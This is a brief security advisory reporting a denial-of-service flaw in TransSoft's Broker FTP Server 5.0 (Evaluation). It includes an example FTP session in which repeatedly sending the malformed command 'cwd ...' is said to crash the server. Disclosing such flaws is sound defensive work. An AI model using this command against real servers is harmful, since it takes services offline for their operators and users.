  TransSoft's Broker FTP Server DoS (CWD)

SUMMARY

 <http://www.transsoft.com/> TransSoft's Broker FTP Server has been found
to contain a vulnerability that enables an attacker to launch a denial of
service attack against it by issuing multiple malformed "change directory"
commands.

DETAILS

Vulnerable systems:
 * Broker FTP Server version 5.0 (Evaluation)

Example:
$ ftp example.com
Connected to example.com.
220 TransSoft's Broker FTP Server. (Version 5.0).
User (example.com(none)): test
331 OK need password.
Password:
230 Welcome to TransSoft's Broker FTP Server 5.0
ftp> cwd ...
(Sending this command a multiple number of times will cause the server to
crash)
